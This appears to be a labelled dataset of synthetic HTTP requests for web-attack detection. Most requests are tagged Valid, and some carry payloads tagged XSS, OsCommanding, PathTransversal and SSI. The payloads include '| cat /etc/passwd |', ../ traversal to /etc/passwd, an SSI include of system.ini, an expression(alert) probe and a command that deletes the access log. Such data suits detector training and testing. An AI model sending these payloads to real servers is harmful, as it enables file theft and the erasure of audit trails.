Proxy-Authorization: Basic cnRtYjppTW9naDVz
Authorization: Digest nc=8d1ecaa2
Range: -5208,9131-01794,317-32381
Referer: /8dyoto/euyt2n/EonWti/Sai0Td.cfm
TE: trailers
Trailer: Date
User-Agent: Mozilla/7.0 (X11; U; SunOS sun4u 5.1; Oa-oa; rv:3.1.0) Gecko/09814408
UA-CPU: 68000
UA-Disp: 8045,183,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 680x3732
Via: 8.0 247.196.118.135
Transfer-Encoding: compress
Upgrade: Wtis/2.1, nat7E3/0.0, faaei/4.9, oas/2.1, fFtihs/4.5
Warning: 629 69.63.243.157 "xtzo" "Tue, 07 Oct 08 08:00:58 CET"
X-Forwarded-For: 250.195.95.132
X-Serial-Number: 6114886940251
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28638
Start - Id: 2636
class: Valid
GET /sE7z@/iwtoaawSo0/5mstyleuwexecFN.htm?wonagao=8984635&ionfnwrsk=60211&krererwboE=90lhfRwAID&nrpLaebii=15&keneqhdanenajMr=%3Fsam+hnh%28t1&snpn7120y=weo&etE9seEietos=meta%5C&Tfe5rE=351117&xinrsrwu1bsyE=c8&tIeesRaf=sammj47neiefttie&DN0u=ahr&xtermDTf3VZ4NW0Y=8310867&be=2085 HTTP/1.1
Host: 3.72.11.96
Connection: 3sjrinw
Accept: image/jpeg;q=0.7, application/zip, text/plain;q=0.7
Accept-Charset: *;q=0.1
Accept-Encoding: gzip, compress, deflate;q=0.4
Accept-Language: *
Cache-Control: no-transform
Client-ip: 151.149.106.160
Cookie: ohwnftJ=object-r/s
Cookie2: $Version="224"
Date: Tue, 17 Mar 09 01:54:49 UTC
ETag: "Gf4aapE3mC37awiDN8nh"
Expect: eete=ebyt;egeE
From: hcqlau@ypyesaoel.fr
If-Modified-Since: Sun, 31 Oct 04 17:54:05 CET
If-Unmodified-Since: Tue, 25 Jul 06 20:29:05 CET
If-Match: "7EXLXkdRCAmF_nQXB5_G"
If-None-Match: "PcchqQvKf22_aZS_W8"
If-Range: *
Max-Forwards: 8002
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.noelxt.uk/uceliu/partes/cnIjab.mdb
Authorization: b8eo iiFr=tnomseus
Range: 6287-
Referer: http://www.uaeta.de/klMeAa/nroTig/dadtn/osEtymz6/rtabhas.fgf
TE: trailers
Trailer: Accept-Encoding
User-Agent: ianm (mo9V3UH; oJPR._UIv; 3g693ZgYgn; c1oivYJfhA)
UA-CPU: 68000
UA-Disp: 409,1827,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 907x1790
Via: 4.7 www.ereou.tiff
Transfer-Encoding: compress
Upgrade: YMots/9.9, 2loo/9.6, cgTcde/7.3, ltne1/8.2, mro0ot/2.9
Warning: 388 www.Fet6pwu.shtml "nteouIii" 
X-Forwarded-For: 231.234.57.54
X-Serial-Number: 93836
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2636
Start - Id: 2079
class: Valid
GET /ls9s/hoifczhgrsilOY.shtml?srr=5876&flinkh1e=+9dfwteeefn%28wrd&hn91tlrN=catl&tpt7AratD=3065&wt3ceis3sovzb=elrsrochhhnode&SHdoi=9093&ueyiscdaa1lo=748673&h4=15165 HTTP/1.0
Host: www.cdtRhltdAb.org
Connection: close
Accept: video/mpeg, video/quicktime;q=0.7
Accept-Charset: *;q=0.9
Accept-Encoding: compress;q=0.6
Accept-Language: oicon3Th-e
Cache-Control: min-fresh=7
Client-ip: 228.194.108.148
Cookie: no=5w;20qa2EpsKiA=$r$nu?remR5y;mbtmwhtha6=lTaelwTltaby;b742hepsieG5le=1SX.rd
Cookie2: $Version="71"
Date: Sun, 02 Nov 08 12:03:33 UTC
ETag: W/"OYtbSdFPKASQFidRef"
Expect: xglpw
From: Iosu@aert5hd.ch
If-Modified-Since: Tue, 30 Dec 08 19:01:07 CET
If-Unmodified-Since: Thu, 25 Feb 10 16:28:11 UTC
If-Match: *
If-None-Match: "QromzpSLi3iZIOJ0yWDX"
If-Range: Sun, 15 Nov 09 20:18:55 UTC
Max-Forwards: 274
MIME-Version: 8.8
Pragma: snu=psoioNe
Proxy-Authorization: Basic bDU0RTVvcjphZWEwdA==
Authorization: NTLM dWdFdHRoYWwxb2g1aWhzZnJjOGF0U28yNDUyZXM2aTZiNzJlMQ==
Range: 703917-,4853-42336,855-
Referer: http://www.azdtm.ch/itse/nmey/udeogcyp/2ppatesa/51re.conf
TE: trailers,gzip
Trailer: TE
User-Agent: Mozilla/6.0 (Windows; U; Win98 3.5; 06-sO; rv:8.7.2) Gecko/23689071
UA-CPU: StrongARM
UA-Disp: 4115,383,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 9053x775
Via: FTP/2.5 115.197.209.44
Transfer-Encoding: tlvs; uwvla=rSdhfsee
Upgrade: hli/9.0
Warning: 818 177.52.40.0:7 "eese0qtmam" "Thu, 12 Nov 09 18:55:16 GMT"
X-Forwarded-For: 108.113.52.240
X-Serial-Number: 0933416903549
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2079
Start - Id: 10214
class: Valid
GET /uR6Uu.egAN/mail0dk.TFHeS2au7/DL9/2oneebusfeopUnsadabe.aspx?n1d6DsEp1v5=ehgldalmoATdleRWs&3epOpNuidf=iV_33&odmaemg=%5Deztd&nams=tNY7763gNk.n HTTP/1.1
Host: 140.192.238.176
Connection: OamBatm
Accept: video/mpeg;q=0.1, image/*, audio/x-wav
Accept-Charset: *;q=0.5
Accept-Encoding: gzip, gzip;q=0.3, deflate;q=0.6, gzip;q=0.4
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 148.84.86.46
Cookie: Mii=73;8fDaraett5go=tOt;hqhDrsdmhgcrc=aBSbTCmR-ScR
Cookie2: $Version="65"
Date: Tue, 29 Dec 09 08:37:36 GMT
ETag: "wfJSHyEnufrjs.Zn2j"
Expect: oeeSt
From: wtrHit2e@1hInbeFrp.de
If-Modified-Since: Tue, 14 Oct 08 01:54:40 UTC
If-Unmodified-Since: Thu, 14 Jan 10 14:11:16 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 06
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: NTLM bG9leGlSbnBrdWVuMVhoZXJtMGR4blNlbHRlbHdsYXRpMHNocmlvZDlwZG52em8=
Authorization: Digest opaque="delEi"
Range: 399-,-5952
Referer: http://www.Fhiw.uk/trneedt/snnmoTt/0atM.png
TE: trailers,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/7.3 (compatible; Konqueror/7.3; Open BSD i586; hihs; htEoehfU)
UA-CPU: MIPS
UA-Disp: 6635,0350,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 099x017
Via: HTTP/6.2 83.79.245.49, HTTP/8.7 www.s6tysia.jpeg
Transfer-Encoding: a7fa
Upgrade: tno/4.4, ari4nx/1.7, OHatsi/6.5, tm9Et/4.0
Warning: 637 www.hs6E.png "t1aojshwaSSaeBsobih" "Fri, 24 Jun 05 14:32:42 CET"
X-Forwarded-For: 119.252.21.3
X-Serial-Number: 9799950017867099
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10214
Start - Id: 21643
class: Valid
GET /iullahaneyui/n9r9h7adeasdoeT0cl3/kQi.ieYXv4snnYfCQe/HrptbOnRpqdrnitean/iaNoikptOlnlnt5ogeo/lysneHumrcel5eR/dQ3eaeanp1lehnhaam/l9mueiuhAsulievscrW/tQxICzGXsxRQ7/aoa7uwnheiAwzh7ieh.htm?rsuhhhei0onr=azWGI&nIxres=nX5ck7AI HTTP/1.1
Host: 187.178.227.126:6
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip, deflate;q=0.4, gzip;q=0.0
Accept-Language: se-sEul0E
Cache-Control: ttC='th'
Client-ip: 211.84.162.129
Cookie: rsfaeaeola7ttrl=rd
Cookie2: $Version="715"
Date: Mon, 07 Aug 06 08:40:00 UTC
ETag: W/"0VhiS0Dr@.npOb.dea"
Expect: Xel8
From: ynfima@o2e6raaBs.org
If-Modified-Since: Mon, 02 Apr 07 13:46:12 GMT
If-Unmodified-Since: Sun, 03 May 09 11:11:17 CET
If-Match: "ZC6VHvcYhNJ-M@w1"
If-None-Match: *
If-Range: "D_AvSv4dU.Izs-vigWfg"
Max-Forwards: 314
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: Digest cnonce="ms4Mq"
Authorization: ony9rr tonhg2hr=eeotp
Range: -70672,783-,227-
Referer: /eeohmsda/re2ff.asmx
TE: trailers,trailers,deflate;q=0.9
Trailer: If-Unmodified-Since
User-Agent: Mozilla/4.0 (Machintosh; U; PPC Mac OS X 8.4; oi-ny; rv:7.4.8) Gecko/46214801
UA-CPU: PowerPC
UA-Disp: 335,8067,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 838x039
Via: 4.4 www.twri.png:9461
Transfer-Encoding: identity
Upgrade: rta/6.9, hinor/4.0
Warning: 753 www.r8e8sd.jpeg "PRrTs4cebef6fdeoabnr" "Sun, 27 Mar 05 04:06:35 CET"
X-Forwarded-For: 102.122.239.98
X-Serial-Number: 1329095
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21643
Start - Id: 47196
class: XSS
GET /nsOesayaseet/5hohvngaGzmdrps/h.A8Vb.SRaBoLVO/l_EoOfCFE/rbtcmdXQPIniUyscriptopt4/otswontmshNehteot/dsBVKZzWrB@m59Xl/nnrotaeysNateerr/tYtmnNcah4aRmeeeeo/a8F_vZmrZOLH1/TNB_f@BEBF7s/eYyO4m8R655DrU.msf?qha3a1ht6E=iR5&dphi6ebwhinwn=obfaR++++style%3Dleft%3Aexpression%28alert+%2881.llt6%29%29 HTTP/1.1
Host: 161.60.116.50:94824
Connection: dE7arOr
Accept: text/*;q=0.5, application/rtf;q=0.9
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=892
Client-ip: 34.140.216.85
Cookie: iarbsitmelUo=52;eddhS=4vF;JOnullx=87012;CDpjN=933017345;da=dztcedi;RP0uW9b=3111564
Cookie2: $Version="4"
Date: Sat, 10 Jan 09 09:30:25 UTC
ETag: W/"M.D_V9Hhyz7aLO5"
Expect: c8RTppe
From: odfe4mcc@abteyQ.be
If-Modified-Since: Tue, 19 Jun 07 18:03:16 UTC
If-Unmodified-Since: Sun, 12 Jun 05 13:30:07 CET
If-Match: *
If-None-Match: *
If-Range: "TzOgKWybZzxCQLcAoEV"
Max-Forwards: 666
MIME-Version: 9.5
Pragma: no-cache
Proxy-Authorization: Basic OG53NmFmOnNoc0FuYXA=
Authorization: Digest realm
Range: 62-80366,-217,68-
Referer: http://www.i1r7m.de/oneLdm/naMc.php
TE: trailers,trailers
Trailer: If-None-Match
User-Agent: a7Whiowavd http://www.yo9i.fr
UA-CPU: 68000
UA-Disp: 4828,524,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 286x017
Via: HTTP/0.9 0.129.47.217:19015, HTTP/2.2 195.32.189.7:0, 1.5 www.piIriuf.js:824
Transfer-Encoding: 5ore; EErEntt=tRtocaD
Upgrade: urd/1.0
Warning: 683 181.248.214.19 "qlt9unMovxwdh" "Tue, 18 Jan 05 01:02:04 UTC"
X-Forwarded-For: 25.149.50.16
X-Serial-Number: 533969856895
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47196
Start - Id: 43149
class: OsCommanding
GET /e4HDiAPIbFl/rQvAj/ekGiFNZR/4H4EC@/VunionKzconnect/bt1V-Z174dQy/W1gcQRLnL.Op/2p/nT@ip3wGZJqwNWhQ/nodesL_6vstdineLA7HOg.css?ovaU=%7C+cat+++%2Fetc%2Fpasswd++%7C&5n5=nio&8nt2=fDTBm2t7&amongzetsahw=2echo%40nq%28soe%3B HTTP/1.1
Host: 37.213.154.29
Connection: TouR
Accept: video/mpeg;q=0.5, video/quicktime;q=0.4, application/*
Accept-Charset: iso-8859-5, x-mac-korean;q=0.5, koi8, utf-7
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 66.158.131.150
Cookie: ZgH15j3d=wOo
Cookie2: $Version="11"
Date: Tue, 13 Apr 04 23:04:32 GMT
ETag: "8Si792-o4C3zcdKh6"
Expect: tvNyv
From: riAeyrh@tgaMea.st
If-Modified-Since: Wed, 27 Oct 04 01:09:11 UTC
If-Unmodified-Since: Fri, 16 Apr 04 06:13:13 CET
If-Match: *
If-None-Match: "mhjSf-DRCZu.Wxk.J5"
If-Range: "Dr1UN7YVdxvt-oIEZ_i"
Max-Forwards: 47
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: cenn vpwg=rlsiiwt
Authorization: Digest algorithm=MD5-sess
Range: 46359-,93372-15,76-
Referer: http://www.ygui.cz/nwtsau/owres.php3
TE: deflate,trailers
Trailer: Host
User-Agent: Mozilla/2.7 (Machintosh; U; PPC Mac OS X 3.5; fs-mh; rv:0.6.0) Gecko/46040342
UA-CPU: Sparc
UA-Disp: 309,0830,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 699x046
Via: 3.2 82.223.219.241, FTP/1.1 18.245.99.117:42
Transfer-Encoding: gzip
Upgrade: sPlrA/2.7, nth/6.0, S4hn/1.6, eStqn/4.6, aarg/7.7
Warning: 027 www.snsA.shtml "dncghr1daAmsfa" 
X-Forwarded-For: 1.132.119.183
X-Serial-Number: 197146981100118
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43149
Start - Id: 44661
class: PathTransversal
GET /Han/xht0trnrtatecc/dP/TgjWimgjD/tlk8srLrUjem5e/nta/Tp/gr0/lt5VkF.M/nYIivr0NXP_/iL@3A3MoyD.asmx?elwb3orike=1657&WweYX0v=locationdocument+n9A96nn%5Cip%7CNn&olinkmadminY=542&ate=%3ElkadminwnTod&b3aourgi0e7n=0218&vrht7torwl1o=iHnbGY&ortusnocafels=q HTTP/1.1
Host: www.t9ms0.be
Connection: e3ema
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: dW8i-og;q=0.3, erp1-a6, n-o;q=0.6, ssene-asEAn;q=0.5, r9-7;q=0.5
Client-ip: 48.43.170.158
Cookie: mwrNebtpigiirs=/./../../.././../.././../.././../../../
Cookie2: $Version="591"
Date: Sun, 07 Mar 10 04:25:40 CET
Expect: dgct7Ia
From: eeuabRn@lal2mty.ch
If-Modified-Since: Mon, 17 Nov 08 09:49:23 GMT
If-Unmodified-Since: Wed, 26 Dec 07 23:06:48 UTC
If-None-Match: "pRjdnLfcnQyk7Z4"
If-Range: Sat, 18 Oct 08 05:37:38 GMT
Max-Forwards: 05
Pragma: no-cache
Authorization: Basic dW1laW46T2ludHRpNWg=
Range: 316-826
Referer: http://mfeyop.org/t3httj/tq2Paee/enegi/upocma.exe
TE: trailers,gzip;q=0.6,trailers
User-Agent: Mozilla/7.5 (Windows; U; Windows NT 0.1; 9W-Af; rv:1.9.0) Gecko/90918481
UA-OS: Windows 95
UA-Pixels: 827x397
Via: HTTP/7.8 145.208.135.91
Transfer-Encoding: olesa; ehgneo=cbtma
Warning: 228 172.128.177.184 "teeeuO" 
X-Serial-Number: 17192
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44661
Start - Id: 46197
class: PathTransversal
GET /sxt6eb/releeuitnaihCn/9eeedrtrr5bnGnleev.asp?dtafMrau3=tmtnod&vichrmmNf6eia=8008&mnOrloecs=ptmpet0-+j+wzr6lsh%7Cs&lTIex=pgMmFJNrUTd&dm=idocumentro+g+&eugnnei=yldtydyfetpefd&nes=o1DYpe&decadldeenmb=rJHPYe%40&olcnuaz=tQXI5&mns6t=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&vdee=479 HTTP/1.1
Host: 20.194.180.108
Connection: eishz
Accept: video/mpeg;q=0.0, application/zip
Accept-Charset: *
Accept-Encoding: compress;q=0.4, gzip;q=0.3, deflate;q=0.9, gzip, compress
Accept-Language: aq-slbeni;q=0.8, ao-sdb;q=0.4, tlrdni-ndd, u-ethBtgt
Cache-Control: max-stale
Client-ip: 250.173.5.46
Cookie: nossjso6lwpuBs=4221466;fEUtJEFtmpLE=350687;drthy=ts1drp
Cookie2: $Version="43"
Date: Sat, 01 Oct 05 15:34:16 CET
ETag: W/"BwoAIQ_gJnkwh@ELCI"
Expect: 100-continue
From: sloo@sd406oko.ch
If-Modified-Since: Thu, 31 Jul 08 08:55:47 GMT
If-Unmodified-Since: Fri, 20 Feb 09 21:16:22 UTC
If-Match: "GT6rFwb8xEhzB6t"
If-None-Match: "__ytYBxTQUR.s9oq"
If-Range: Sun, 06 Nov 05 19:12:52 GMT
Max-Forwards: 2600
MIME-Version: 1.0
Pragma: jba='f'
Proxy-Authorization: NTLM dXNoNGdodHRybzRucGtlTHJpbzBmaTVGaWhzYWhyaWFlYXE=
Authorization: NTLM c2Vybk90bm5paHRhbGoyZW5lcnNiUnJjZ2VkYXBkZXU=
Range: 3-60707,6378-,-00133
Referer: http://sonaben3.com/aateen/iwElw0ii/goefp2uu/iaveNr/n89s6n.php
TE: trailers,trailers,chunked;q=0.8
Trailer: Accept
User-Agent: lWhv/8.5.4.6
UA-CPU: x86
UA-Disp: 411,052,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 939x7286
Via: FTP/0.8 214.77.125.123:174, 6.5 www.hehdf.tiff:6177
Transfer-Encoding: deflate
Upgrade: eesinn/1.0, mc0b/6.6, eaa9an/7.8, olCrho/0.4, dhbfna/5.5
Warning: 034 www.nkeyuho.html "s4csmi7rg" 
X-Forwarded-For: 249.22.33.20
X-Serial-Number: 4158799
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 46197
Start - Id: 40679
class: SSI
GET /FW4LK/JVriJLQMPRC7q5/b3jVAc/t6vHER@l6BpWjO2a/eFFtre7hCu/SKVkxhimgEbfliGS/yy/iaeUtd/rdxObopnmnetEhSsOdiM/MDIPgDMcxetcWOANK/kP/cqstsreljl.sh?it3loaToej=%3C%21--+%23include+++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22++--%3E&pnc0ebnrse4au2=939 HTTP/1.0
Host: www.ajrh.biz:80
Connection: close
Accept: */*;q=0.5
Accept-Charset: x-mac-korean;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 59.227.224.32
Cookie: xrzsneOktnshtws=414;mehsgarXwiEely=9i;pynombol=lNstbars4fmhrera;tqteqef7ewg2zn=eJnointoeEiiheoets;1hclrqr=e.iCg0iie
Date: Fri, 08 Jul 05 20:15:42 UTC
ETag: W/"nQowONbBuqGBRqoN"
Expect: a7cn
From: kyipfoyn@ugT7me.be
If-Modified-Since: Sun, 07 Jun 09 13:58:06 UTC
If-Unmodified-Since: Mon, 10 Sep 07 04:09:34 CET
If-Match: "99O..PUVgPiAO.3-gk4"
If-None-Match: *
If-Range: Sat, 17 Sep 05 10:18:40 CET
Max-Forwards: 04
Pragma: ooa='sRn'
Proxy-Authorization: Digest realm
Authorization: NTLM dG91cm85YW9hZ2lldW9tbDZnZWl0NTk0aGZ2bWViOTVsdGVZNTY3enJydm4xZWVy
Range: -41940,-0
Referer: http://www.eagchIe.cz/gehu/brefre/ciwsa/ynmUsnb/esffstt.cgi
TE: trailers,chunked;q=0.1
User-Agent: t8Lscm41Ce (ehELn.8JO)
UA-CPU: StrongARM
UA-Disp: 854,3532,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 106x2848
Via: 5.6 www.i7bcEo.png:2, ieno/6.2 www.tqvenf.css:28216, 9.9 www.naeq.shtml
Transfer-Encoding: gzip
Upgrade: 2vu/5.3, otv/1.9, eEln/4.0, xlziey/0.0, f5sv/6.9
X-Forwarded-For: 236.213.169.46
X-Serial-Number: 017478485639
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 40679
Start - Id: 43179
class: OsCommanding
GET /aU4ZGveQv/8zpG63tv6uXzN@u/hie9fop/Gyy_ucat9Vr3JPa/nf6ak7ai8rnn.js?jX2execimg41node8=%250arm++-f+%2Fvar%2Flog%2Fhttpd%2Faccess_log%3B&ash8uEwhltldI=88248468&aesaer=808212&VwaPcatrPP=sw8goqwyorrflzie&chchhvs=iokaeeiE&.havingbinO8@7-H3H=ngotwwus&hO7S=eDx&dmTsoyc=046&EShntsudd=odrnr&s9cpnh=8xtermajdb%7Caso&aldoiiZhorj2=w%7CTfLtbs6dan&eb=82392 HTTP/1.1
Host: 209.132.143.45:4835
Connection: 96it
Accept: application/*;q=0.4, video/mpeg, image/*;q=0.9
Accept-Charset: *
Accept-Encoding: gzip, compress;q=0.4, gzip;q=0.6
Accept-Language: yyro-aweE;q=0.6, aojl-ealoss;q=0.6
Cache-Control: min-fresh=7426
Client-ip: 101.140.81.249
Cookie: niiils1eijcmy=538
Cookie2: $Version="74"
Date: Mon, 30 Oct 06 20:31:39 UTC
ETag: "3n7cYjzbN.STqhi"
Expect: 100-continue
From: uirrjt1@GfnEevribm.be
If-Modified-Since: Thu, 19 Jun 08 07:54:54 UTC
If-Unmodified-Since: Tue, 27 Dec 05 02:01:59 GMT
If-Match: "HH0onu5_nieijQ1.Bi"
If-None-Match: "_XrOkaV-hcx2jyj"
If-Range: Sun, 24 Sep 06 12:14:53 UTC
Max-Forwards: 9584
MIME-Version: 6.0
Pragma: esr='1taw'
Proxy-Authorization: hnLn 4itor=97es0a
Authorization: onwph lG2cieBg=omtw
Range: 332370-1588,656-95
Referer: /g8l8/9mtf/hhnifmth.avi
TE: trailers,trailers,trailers
Trailer: Authorization
User-Agent: Mozilla/8.9 (Windows; U; Win 9x 6.2; hg-et; rv:4.2.6) Gecko/88682275
UA-CPU: Sparc
UA-Disp: 1503,1276,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 953x846
Via: HTTP/8.1 www.ontw.css
Transfer-Encoding: tirawo
Upgrade: ehu/7.5, lem/4.9, eney/6.2, rTm/6.8, lfh/2.5
Warning: 306 www.gnulF0h.html "etlXa" "Wed, 08 Aug 07 07:40:17 GMT"
X-Forwarded-For: 179.224.81.249
X-Serial-Number: 9831419059
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43179
Start - Id: 935
class: Valid
GET /mailbcIXperl5kGXP/e0oie.jsp?ifcidon=4entpih HTTP/1.0
Host: 87.112.127.3
Connection: keep-alive
Accept: audio/*;q=0.2, image/jpeg, video/quicktime
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: n-icid, Btd-Op;q=0.5, g5tNItof-ebhs
Cache-Control: max-age=5468
Client-ip: 137.42.138.53
Cookie: thksgiaQairmHca=11;TAceo=nesszjttrtkruP
Cookie2: $Version="0"
Date: Thu, 13 Aug 09 02:40:19 CET
ETag: "jr06Kr9AbFL4OWD"
Expect: 100-continue
From: shr8m@eagitmhb.de
If-Modified-Since: Sun, 18 Sep 05 20:49:44 CET
If-Unmodified-Since: Mon, 22 Nov 04 03:50:06 CET
If-Match: "hSQi-OdIav8Nv5E"
If-None-Match: *
If-Range: *
Max-Forwards: 714
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: Digest nc=3BA1ee0d
Authorization: NTLM aWFFV2l1b291c283dFJjNm9kNmMxdW9sb2N2aWlha3pmb3dhdjhvZGFhcw==
Range: 37-165,99813-448132
Referer: /ndl2lt2h/fer9ienm.php
TE: trailers,trailers
Trailer: Expect
User-Agent: tWl5DPZDk http://www.h0o3m.fr
UA-CPU: Sparc
UA-Disp: 705,7453,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 272x609
Via: FTP/3.3 252.233.63.73, 4.1 164.88.161.36, FTP/6.2 62.196.73.123
Transfer-Encoding: gzip
Upgrade: ero/9.1, efreh/0.0
Warning: 028 90.73.184.74:3067 "pe3oiolmIthbRveDesnt" 
X-Forwarded-For: 21.215.62.37
X-Serial-Number: 09721285233182
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 935
Start - Id: 23927
class: Valid
GET /4oMI7x4/0M/aTst8eaplys/oP5sNk/e5wV/erLKz7R_hAK5TiZj/of1w@N@HGp.Jfy9kq./6e/hs8oz.usPK3Ip.mdb?3tetz=820&E4QIdU8iV=tJJy&mmg=szA-ZwWFI96&nrT1zgoea=00&9runon8o2dltu=93319601&knGNAilHmcr=a%40j HTTP/1.0
Host: 69.119.83.184
Connection: close
Accept: image/*;q=0.9
Accept-Charset: x-mac-roman, windows-1257;q=0.4, windows-874;q=0.8, windows-1258;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Client-ip: 2.223.79.50
Cookie: eo4ja9dn2str0=sda
Cookie2: $Version="82"
Date: Thu, 03 Dec 09 20:00:12 UTC
ETag: W/"o1k84rC7tsnY8nbdP0O1"
Expect: a8ostnl=l4inei
From: grcnsLr@2tnritg.be
If-Modified-Since: Sat, 24 Oct 09 19:53:35 GMT
If-Unmodified-Since: Tue, 07 Aug 07 17:01:30 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 07 Jul 09 21:28:28 GMT
Max-Forwards: 7345
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: NTLM NnVleW96U2JjdGVlc0VkbXN5c1dlaGVlOGVhdHRvdVNuZm5uZWF0
Authorization: Digest algorithm=Rrela
Range: 44896-8775,-22396
Referer: /hro0i/frZncnys/atsTn.ace
TE: chunked;q=0.0,gzip;q=0.6,chunked
Trailer: Accept-Charset
User-Agent: Mozilla/5.1 (X11; U; Linux i386 0.6; ds-el; rv:2.2.7) Gecko/05723193
UA-CPU: StrongARM
UA-Disp: 722,7012,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 916x209
Via: 6.3 10.226.116.44, qrru/7.5 www.myeier.shtml
Transfer-Encoding: identity
Upgrade: tehni/0.9, Cea4fl/2.0, ztoh/4.3, pe6/2.9, ad9/9.3
Warning: 790 171.116.173.213 "hopsown6nqcIceI3A" "Sat, 01 Oct 05 02:13:23 CET"
X-Forwarded-For: 220.20.217.236
X-Serial-Number: 383867
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23927
Start - Id: 32115
class: Valid
GET /execVSPincludeKLVselectt/dbxThejcnenwjduzl/nOEQmKN/evKeewB9UwH31@dBYCw/3LO.5@qW1q5UP/sm-EvfOlJdbhc-HsX/nNE6XIYamo.iNiNlocP1/bnTxu/188PBJD/5elFnOg/oqNz6R_tV4ZXpwwH4.jsp?czntehmah=e%2Ff-w&uo=3o7&krNh=seaecHehishadnym&-Zope=zlcmurwondntpWsgAs HTTP/1.1
Host: www.rQ3e.be
Connection: uymInab
Accept: */*
Accept-Charset: x-mac-hebrew
Accept-Encoding: compress, gzip, gzip, identity;q=0.3
Accept-Language: iue-od0fs, fnWNyero-si7ol;q=0.5, hAu-s, ep3cyx-ivc
Cache-Control: max-stale
Client-ip: 234.77.42.198
Cookie: r0acpRdar=twhTnttHb;ei=8272117;ncilrst4srAtgbx=iihlataniAtovo;znE=7739;rshEu9lhhlb=e<tn4iid>a
Cookie2: $Version="322"
Date: Fri, 14 May 04 06:07:51 GMT
ETag: "iDCjVXFBAhElyMLH-Z"
Expect: znnrtj=5seob7w;erlhsae=uifl
From: ijahAc@tatq.st
If-Modified-Since: Sun, 01 Nov 09 18:18:14 CET
If-Unmodified-Since: Wed, 14 Apr 10 06:55:33 GMT
If-Match: "zY5@zSYba0rqOWdSf"
If-None-Match: *
If-Range: Sun, 29 Aug 04 05:03:48 UTC
Max-Forwards: 6
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: NTLM ZGxpMnplaW4ya2VsZW9mYXRkdExvYmdpY3RjenJvdXN0c3M0M3Q=
Authorization: NTLM cnJkYW5lYW9zaHZpbWlhcGF3dGV0dHM4bzlhM2V3MGJkNm8=
Range: 095730-
Referer: /aene7n/rletten.swf
TE: deflate
Trailer: Accept-Language
User-Agent: Mozilla/6.8 (X11; U; Linux i586 1.9; eh-to; rv:3.6.3) Gecko/19124098
UA-CPU: 68000
UA-Disp: 3488,5746,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 367x7496
Via: 0.5 www.hIdloEhe.png, HTTP/8.3 98.6.157.249
Transfer-Encoding: gzip
Upgrade: a5eieE/8.0, drayHi/8.0, nnh/0.8
Warning: 593 210.153.84.107 "domopgoe" 
X-Forwarded-For: 212.42.200.181
X-Serial-Number: 3953508
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32115
Start - Id: 1205
class: Valid
GET /mxm2pp-rcplo/ne2ues2ttw/eosrOSd28sef8t8/eZ4XbaNDREgK/fcoj_mA@A0AS9A/a7vOQib16sahL/8fGAJbu5V.Y/eEkAYX4Wn/yoIheha/14ARg14l.XYq.jsp?icw5drkciaeen=3&TSnaQstec=fardglTtn8pcDno&tredkonwbaaodUf=0481256711&dm=7eCacceptimgPt0dEiin&k31E6QG=G0dm&yezcderdpte2iy=82 HTTP/1.1
